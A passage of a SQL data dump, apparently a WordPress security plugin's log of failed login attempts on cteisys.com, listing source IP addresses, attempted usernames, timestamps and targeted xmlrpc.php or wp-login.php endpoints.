('103.27.60.66',1729838146,'newd',0,1665651728.9976,152,'t0pEnQjDuTvLPfkZNGszbho8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.171.183.101',1051440997,'newd',0,1665651727.3462,152,'qR8dhzW2aIOe5wHiSCG10fLx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.73.33.135',843653511,'newd',0,1665651715.1097,152,'DUEujz9nMOoLZXr84IvfhSTB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.184.215.230',532207590,'newd',0,1665651713.5673,152,'Psbx7AHETFZh6qLl0S4cQgDR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('125.212.229.33',2111104289,'newd',0,1665651709.2797,152,'vjnkSXGAfaVibrQ49oTMILHm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.179.81.192',884167104,'newd',0,1665651701.4737,152,'SyfhD9sLiKblFm1J4ak6dP3W','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.38.88.250',3324401914,'newd',0,1665651686.3000,152,'n3yaLTpdZeGIK8okstAH9rBz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.52.186.8',1211415048,'newd',0,1665656278.9899,152,'Vt0ZXbD6qfNnKrH32p5yhsel','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.228.32.9',1122246665,'newd',0,1665656270.7325,152,'ygtNoBpVIFZwOnLUk0CxDvsA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.50.56.4',3107076100,'newd',0,1665656270.2820,152,'WnzyaJ4KAYNXOhS80GdkgV9w','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('49.12.114.46',822899246,'newd',0,1665656262.0930,152,'ARmiaPB6oVzysS3rHhgO5Uc1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.232.160',2487806112,'newd',0,1665656259.6187,152,'4JUiK2WkzxXjn7HaPy8t0N9e','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.64.187.254',759217150,'newd',0,1665656252.1975,152,'1pmPdiVtJqoXrnejSYylsHwc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.52.186.8',1211415048,'newd',0,1665656252.1065,152,'yHPRtvqDBsemzNnc4Q3kpfJw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('164.92.169.121',2757536121,'newd',0,1665656252.0870,152,'OcPT0fosJwpN8gKtiCAIr2LD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.240.216.162',2733693090,'newd',0,1665656138.8834,152,'8XuHCywAUWqzSBYk6hObGlVd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.78.164',2808303268,'newd',0,1665655984.2330,152,'NxzDnmjSP6MB3lZYWiXFIa5A','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.244.140.199',2415168711,'newd',0,1665655578.5385,7,'qg4x3YTNp6kahmWL2tvKURzE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('95.111.225.89',1601167705,'newd',0,1665655577.9044,152,'aQdSnkpl3gvG9FJDwTuiA2o1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.79.146.95',860852831,'newd',0,1665659718.1658,152,'UHeLEVGaS0QrJu53qt18BmvW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.145.51.200',1737569224,'wadminw',0,1665659677.8672,152,'6ArWnPqUxRKQYMEG5dusHvmo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.176.79',1137553487,'newd',0,1665659201.8558,152,'q8xFDf7BXrkpL054nmvbjJdc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.184.215.230',532207590,'newd',0,1665659195.0346,152,'76Ldm3vb8g0IJXR2efcrDQyV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.178.146.199',867340999,'newd',0,1665659193.8269,152,'I1sANOi63XGT5WpCbUMwSK0L','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.145.125.175',579960239,'newd',0,1665659185.0942,152,'Favi1RrEuQTy5dIC68WG3LV0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.63.235.189',3258969021,'newd',0,1665659182.8840,152,'cCKeJUw4n27jumTi5L8dQIsV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.77.159.5',3494747909,'newd',0,1665659169.2033,152,'gQjhBWTxurqLCsRe7yYp8k0E','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.134.248.245',1535572213,'newd',0,1665659169.2019,152,'y3REtFOdxeSU6isf5W0mNnaZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('41.93.82.7',693981703,'newd',0,1665658837.7326,152,'ZPCiKVSnmkvGscMbeOY6zDjW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.98.152.12',1734514700,'newd',0,1665664829.9602,152,'eipo04kaFwuI1mAVDLGW6On5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.15.160.148',856662164,'newd',0,1665664354.5928,152,'df0Y4lxoNVrpBuhw1A6c5Oay','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.214.123.41',2731965225,'newd',0,1665664247.3560,152,'VBrTNE7MIxmWCbL4h2cJpSUi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('86.105.9.67',1449724227,'joyce',0,1665663657.5526,152,'ZWRVO5TwA6N0YmGxjbXMcQpv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.211.94.153',601054873,'newd',0,1665663642.3045,152,'TIfRaLYD5n1A3CB7XE2dFUuJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('125.227.127.195',2112061379,'newd',0,1665663158.7284,152,'vba9isWQZAlP8gyVzHBGXUcu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.48.210',3515691218,'Joyce',0,1665662873.5026,51,'5PcpgSqU6IDCzQyo2vOY3XiJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.128.5.109',2994734445,'newd',0,1665662601.5418,7,'DUgQPxXGqWejOlNu1pym7I9d','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.68.222.69',1363467845,'newd',0,1665662559.0464,152,'ynhZOE4lDKs2XjvH8xJ1fe0u','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.112.128',3110826112,'newd',0,1665662508.7643,152,'8qIcsMPN3bHXrW0kx1AhtlGa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.13.81.56',856510776,'newd',0,1665662493.9419,152,'JVfOyF8lm7rItzbguGe0AUsN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.77.159.5',3494747909,'newd',0,1665662475.9148,152,'jnLaeKuZgXJGd3qohyMzC7S2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('115.78.160.53',1934532661,'newd',0,1665662469.5426,152,'niqoYWZPUsalSmCOMvdD2ut9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('23.226.89.72',400709960,'newd',0,1665662461.1366,152,'D13QPHOEsr2d4IyTMgYhAtui','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('70.34.133.151',1176667543,'newd',0,1665662455.9648,152,'c9fhAiPnN8kJVtmREl6Da302','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.202.169.54',600484150,'newd',0,1665662453.1078,152,'4BFTAwRyub3VWCHarn5o1kD8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.97.90.217',2707512025,'newd',0,1665662440.8983,152,'NCzSsWnuJr5tA80ZohmP2yx4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.230.247.143',2531719055,'wadminw',0,1665668323.5984,152,'ir9oMkjA5Sx1Xme4ERqBUFfb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.67.171',3270067115,'newd',0,1665667867.7996,152,'fyeS72EcCudkOD1xhHUoPXtZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.22.104',1152849512,'newd',0,1665667466.3110,152,'83fDPo6zIcJvOsejWQH5XB2U','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('121.78.79.85',2035175253,'newd',0,1665667456.1679,152,'pkwAZf3LErmnJYqXFayh16zv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.176.79',1137553487,'newd',0,1665667452.2252,152,'SlK49xrnL0a1jsNBm86o53ve','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.176.79',1137553487,'newd',0,1665667444.7334,152,'TUaqzJSemYWEK3AvRHw2I4Fs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.228.32.9',1122246665,'newd',0,1665667440.7011,152,'GVcCeZNYqo78OE0jn2HkIBzx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.243.228.84',1307829332,'newd',0,1665667431.4057,152,'AK0lzkX19OwnBZ6NYHVuMhmf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('141.94.87.67',2371770179,'newd',0,1665667427.4699,152,'F8HZVAS3T70GCOaWNpjldeXo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('196.43.185.101',3291199845,'newd',0,1665667421.5238,152,'Zrd0qOL7QP8vmHw3kEFx6Rbu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.168.115.171',3098047403,'newd',0,1665667421.4896,152,'q7ZkIwJnBpPVoCKdODueN654','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('180.211.99.217',3033752537,'newd',0,1665667273.4992,152,'P1c2opAje7a6btusHURJQMrn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.115.100.180',3228787892,'newd',0,1665666834.1176,152,'WOuFCAT7pkhwibQxNeEnrK30','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.92.27.198',1734089670,'newd',0,1665666640.5575,152,'F4dumYavWJSDybO69jtC8kUs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.214.59',2487801403,'newd',0,1665666161.1996,152,'HF9tAkghNOZqKM4iTf037uxl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.9.158.112',1208589936,'newd',0,1665666045.3125,152,'B6amxohMrT0SNyRjUbnlGYPc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.12.125.130',3322707330,'newd',0,1665672441.7362,152,'AHxJie2PMqGU51Ta7bVsQftj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.77.159.5',3494747909,'newd',0,1665672423.5208,152,'BcS6gl8F1b2LiOz4xyr9KECa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.128.143.151',1434488727,'newd',0,1665672422.7215,152,'sDV9j6OA5aqdKNJ0ySkbrLQi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('141.94.203.127',2371799935,'newd',0,1665672415.1192,152,'APG0t1XE4myvOMNhQp3CZaul','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.60.66',1729838146,'newd',0,1665672415.0542,152,'z2KnZDm03JOu4dvAtxjlMQIY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.112.75',3110826059,'newd',0,1665672415.0540,152,'OemIrg9CiXT7pMj3JAsNPt1y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.86.247',1152866039,'newd',0,1665672089.3406,7,'WT3FGlE7Lvk10AjfRZt4NBao','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('147.135.255.8',2475163400,'newd',0,1665671189.5957,7,'3yKvWdn9YApIrxDSj6gM4bof','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.172.143.92',2813103964,'newd',0,1665671058.8633,152,'1O8gFik4puXdqEVsPG0jK6Jz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('49.12.114.46',822899246,'newd',0,1665671054.0913,152,'6JT7XpvxLHqfSPKkIADQFNUr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.228.32.9',1122246665,'newd',0,1665671041.6615,152,'MSpOJb6fWaU8TVxuK4kldvAr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.136.107.178',763915186,'newd',0,1665671041.1276,152,'fcBxv2o7VwKIZ4Jujdys63W0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.163.7',3265504007,'newd',0,1665671030.4639,152,'o7rxBPtuThXFWY5s0lpMEeHN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.202.128.32',1959428128,'newd',0,1665671025.1850,152,'346nx8KDPolGcSOeB15Qq09N','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('164.92.169.121',2757536121,'newd',0,1665671022.1344,152,'uIieqs1K9rG0vckOXmlybU4D','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.170.41.94',2997496158,'newd',0,1665670859.1980,152,'uKXoLEb7t5yzrT4fde9UIshN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.97.90.217',2707512025,'newd',0,1665670858.8822,152,'XQJdkj4hUATtGSrf3s0FCepB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('183.90.250.15',3076192783,'newd',0,1665670855.1712,152,'UtcVYoubBAq1gx9KQeJiZhIm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('37.120.210.219',628675291,'Joyce',0,1665670845.4079,152,'IqcAkJ0HmsvW3GpxdNK9nQ25','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.198.25.12',600185100,'admin',0,1665669866.6314,152,'zmnyPF0JHkOYVl8WiesZhoAN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.104.173',2994759853,'admin',0,1665669736.8351,152,'RuS0px8JvO6tfIzHF5bVQ3Xk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.110.86.9',1735284233,'newd',0,1665674711.1196,152,'Y1l8MwLniTUsk2G69FKrRdyS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.110.86.9',1735284233,'newd',0,1665674685.6612,152,'nR4xOg3lHXuTs8LkZEdvwtSb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.119.82.214',762794710,'newd',0,1665674667.8870,152,'muZPKHS3dWbVL9noXhxRvQYe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('49.12.114.46',822899246,'newd',0,1665674666.9279,152,'JHS854QVRZFCiajBctesE2uo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.243.228.84',1307829332,'newd',0,1665674639.6595,152,'KNfvQCTwxchnBMJLF73tAbe8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.209.222.89',2261900889,'newd',0,1665674637.9253,152,'iLJhARfw12a0vrMG9um58eQg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.70.248.169',1363605673,'newd',0,1665674526.6722,7,'Jkpe8yhYrUwDEuSRjM7ZNxQ5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.27.60.66',1729838146,'newd',0,1665674122.5155,152,'PZ5CFWHYrwNSlmDvfMG6pbA3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('49.12.114.46',822899246,'newd',0,1665674113.2914,152,'PoxdqC2lW4U39BYHGVJ10zaF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.244.184.204',2415179980,'newd',0,1665674113.1868,152,'8kGWgfeFcojSNvOmlYaPBD29','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.77.159.5',3494747909,'newd',0,1665674105.1758,152,'eABYxIX6ZhNbPKOGD5CvLM1Q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.176.79',1137553487,'newd',0,1665674103.2886,152,'5Z1qfNxXAbm3KRBTIrJtGu6v','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.228.32.9',1122246665,'newd',0,1665674096.1915,152,'SJTrXMGcLFq754DZUtdvmQVh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.60.66',1729838146,'newd',0,1665674085.9733,152,'dexHM3TpNrFf7I50JGwlBk2X','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.60.66',1729838146,'newd',0,1665674081.4925,152,'Ncj1FwnaLSU3EqRJKW6hyAIz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.28.78.249',1998343929,'newd',0,1665674081.3868,152,'s3TbUXPdhLq4Vr8kN1BScEgH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.186.242.173',1572532909,'newd',0,1665674081.2443,152,'cPQx9InoR8h06BXsjVqvitbe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.88.88.149',1347967125,'newd',0,1665673621.3067,7,'UwjcoJ1hsDnPGqb9BXtxvEZF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.114.64.93',2809282653,'newd',0,1665677408.5895,152,'IzA3JV1Mc6QkPZx8dH0KjSYq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('177.153.20.43',2979599403,'newd',0,1665677408.9293,152,'oXYGBb2qlVaH4itLfAUKexMP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.228.32.9',1122246665,'newd',0,1665677403.7247,152,'eCdUWixq7m634XRMngKQBv5Z','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('177.153.20.43',2979599403,'newd',0,1665677387.6779,152,'arEKym3enCpFxI1lgHObXGTt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.88.73.86',3495446870,'newd',0,1665677380.7147,152,'052mJHnEeiMoyxr9KBl1gCTU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('115.78.160.53',1934532661,'newd',0,1665677380.6823,152,'knhXjy2QHNu8dxqUOJVvoG0P','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.178.146.199',867340999,'newd',0,1665677380.5826,152,'5AvjsuDazcOUJgCKP9fV0yQF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.37.254.19',3240492563,'joyce',0,1665677043.0796,152,'lE5TRD4ijAqUJ80GBxzcoOkX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.230.127.126',2649128830,'newd',0,1665676967.5318,7,'npDmBoxN92FtCH8dfqwEsM3Y','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('114.115.136.65',1920174145,'newd',0,1665680930.3103,152,'wYgJnQCoFNtu6IGpzZHaRmOB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.64.187.254',759217150,'newd',0,1665680929.7096,152,'IsWHfB817nCJoqm5KxhyTeSz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.38.88.250',3324401914,'newd',0,1665680924.4146,152,'8iEgjWY0qVGoMeZSvBzA7xD2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.79.207.190',860868542,'newd',0,1665680920.3482,152,'qCuJnETN0t8cKSg3Oy147Ws2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.122.92',2160556636,'newd',0,1665680916.5387,152,'vumJq9cVDA4NgX8C6xoGFyfU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.196.203.67',96783171,'newd',0,1665680911.0017,152,'SJgcet1qAyxmkW2D5VGQTjEb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('154.197.48.10',2596614154,'newd',0,1665680910.4858,152,'ViTqMRhHetocldgbvQsG86DX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.82.122',2335920762,'newd',0,1665680900.1769,7,'ZOVuvI9Cg8f37JS4naKkGbLy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.233.77.4',3270069508,'newd',0,1665686388.9724,7,'as5lZudxMIjAv2nDepyzowiH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('120.27.240.230',2015097062,'newd',0,1665685513.4355,7,'gOuiQdX06EDslreRUnYZTW8J','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.189.13.99',1807551843,'Joyce',0,1665685082.6370,51,'w18uKGzt6OZmghkXeRx07jfJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('154.197.48.10',2596614154,'newd',0,1665684127.9364,152,'uvPjFbIQAfsOV7UcD4CKlizR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('42.193.106.55',717318711,'newd',0,1665684120.0021,152,'pYhqHy3KngkRsimBbN5rQlZL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('175.178.241.165',2947740069,'newd',0,1665684114.8194,152,'pxDfRsQ0TUtw24HSKENVk1Id','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.25.147.55',2014942007,'newd',0,1665684107.3235,152,'IBAzdrnoWkvjDQXsMNYbg05P','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.22.69.253',2769700349,'newd',0,1665684107.0303,152,'7muqAtdO1KPwaY3ZojB5NVJb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.186.242.173',1572532909,'newd',0,1665684105.6579,152,'eZdG5fzumwUDK9bYrv26cBAN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('164.46.122.50',2754509362,'newd',0,1665684054.2759,7,'wtYFz5oUhJvelOTjgP1yG6dV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('90.156.169.18',1520216338,'newd',0,1665688960.0037,152,'q8HCoJ3GlPfbu4pOQVMIwFmd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.12.125.130',3322707330,'newd',0,1665688959.9468,152,'lY5HxCRvO2P38ywjXJNgd0Q1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.60.66',1729838146,'newd',0,1665688959.9479,152,'iVQqBwgA0WNh863ITmYFMHvf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.130.218.178',1736628914,'newd',0,1665688703.9747,7,'SOBq0JAbdspXFTjmlah9CRt1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('146.56.99.136',2453169032,'newd',0,1665687838.4465,7,'G1ZYiU50LmVKPjcNEyfXzqps','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('68.183.22.104',1152849512,'newd',0,1665687629.7018,152,'ftyGNbirCLXc8oY7wRlsWKgm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('175.178.241.165',2947740069,'newd',0,1665687608.6490,152,'u3h9TzcCJOQiAw0N1Be7R8rG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.184.215.233',599316457,'newd',0,1665687607.8303,152,'SdkJ6HKtgO3FynbmBTA4xojI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.77.159.5',3494747909,'newd',0,1665687603.7834,152,'6EduQUxH29ebOPSGskhINCL1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.73.33.135',843653511,'newd',0,1665692418.5196,152,'WfjBeh4psGEbFoTmSg8zP6LH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.128.143.200',1434488776,'newd',0,1665692418.2582,152,'f1q2oIPXKeHAMEh43ksOlgTv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.73.33.135',843653511,'newd',0,1665691915.8218,152,'iCxhVt5Ip6Zz7nlS2ybfe3d4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.143.92',2813103964,'newd',0,1665691910.5341,152,'lChXsZbAYtzPnJSOuEioIgBq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('121.78.79.85',2035175253,'newd',0,1665691908.7573,152,'K9D4ItR2yT7fF65oSivNnucG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('115.78.160.53',1934532661,'newd',0,1665691899.0123,152,'FrjaMenKU4YcBQdXSkOgCL2V','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.85.103',1386567015,'newd',0,1665691896.0677,152,'2IH8vc3dhajgNGSX6QrEtV4F','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.186.242.173',1572532909,'newd',0,1665691893.9132,152,'4lPtnmEUDgiBQVIcRN97oYOp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.159.77.133',866078085,'newd',0,1665691883.1256,152,'eSwxPG49QV1aE6IkoJCfvhXl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.202.169.54',600484150,'newd',0,1665691881.7634,152,'4ziGVEKyNTpOgl6cmMS1htWo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.110.86.9',1735284233,'newd',0,1665691873.3164,152,'zJAlLFNWKiURsfYHt1Tg4xc8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('49.12.114.46',822899246,'newd',0,1665691873.3162,152,'Y5VwRgdktyqn21spPSi3hEZr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.253.46.194',2684169922,'newd',0,1665697262.2215,152,'kpus46X5Q2MKemBTh3WHyNwi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('39.97.78.175',660688559,'newd',0,1665697259.8577,152,'8A0ZsuMF2Em1qH7XIWNbewin','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.227.144.244',1138987252,'newd',0,1665697250.0978,152,'LhOFfTkqaxKi1vByYDZJIjPm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.81.59.92',223427420,'newd',0,1665697249.3576,7,'kIVCdBvt54qnMRbr2EK6hAfl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('5.249.150.250',100243194,'newd',0,1665697248.5828,152,'jrAnBtVydc4GQg53SEa9FNzY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.60.66',1729838146,'newd',0,1665697248.1427,152,'QbpMJIr84ZLfOjyTB7uHCqDi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('176.31.65.104',2954838376,'newd',0,1665696738.4735,152,'PT9qx2uBpGNd14w3EUnKlOeJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.152.170.96',1738058336,'newd',0,1665696732.3127,152,'aKNUFpe0d92QBj5iG6S4VXxw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.38.88.243',3324401907,'newd',0,1665696727.9330,152,'IeknCuxKgAvQlYiz9w4ySJEV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.12.125.130',3322707330,'newd',0,1665696721.2676,152,'sYAqSIWxmp3iE6oQe425hk8w','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.73.33.135',843653511,'newd',0,1665696718.6460,152,'L6Q1roCbc3ThJOAiyMmENjXx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.97.90.217',2707512025,'newd',0,1665696719.8704,152,'pZoJfMjukcKnlyUEvP2FTL4G','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.77.159.5',3494747909,'newd',0,1665696710.2263,152,'TLKgpXYRumfob79Zs6QENBzS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.56.5.185',2067269049,'newd',0,1665696708.4059,152,'RpSZM2Aou4FWgH8y7KqPaEmQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.77.159.5',3494747909,'newd',0,1665696707.8958,152,'tGUF6ZEhiyV2goWcM490jAOR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('141.94.87.67',2371770179,'newd',0,1665696699.3797,152,'VJNMF08SvalkTYfKCrtGs36P','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.103.94.184',795303608,'newd',0,1665696699.0765,152,'8gGApM5m4PSDH0bV1rYKxiBk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.50.216',3328324312,'Joyce',0,1665696285.6541,51,'IfvUuqm26LZzsROHg0SjYoaF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.244.239.136',3488935816,'newd',0,1665695137.8671,152,'5xtC1Lafg2HMqypovmiukQY6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('94.73.146.148',1581879956,'newd',0,1665695107.4907,152,'oQJKbGSA3Ce8LHkPngNM51Fc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.56.247.161',2067330977,'newd',0,1665695107.3062,152,'lv7pxZcgQReVC8ALD3dXuJmi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.185.6.43',3233351211,'newd',0,1665695100.9695,152,'XytLPVzGHIOoxu3WqvC7T9BM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.77.159.5',3494747909,'newd',0,1665695099.1283,152,'FoaNiC8wxds0V1JSufWt37zM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.97.33.13',1113661709,'newd',0,1665695091.7299,152,'CKkrHjPOTvlwJDzRhBL0q43I','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.60.66',1729838146,'newd',0,1665695090.0555,152,'XnSYs7Rw2hfAHCdBTN9kiG4x','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.22.104',1152849512,'newd',0,1665695072.3127,152,'8MCBVOIpm7dfS1ubJTzysaQ3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.112.81',3110826065,'newd',0,1665695072.3098,152,'RixOAQYEaFvPWt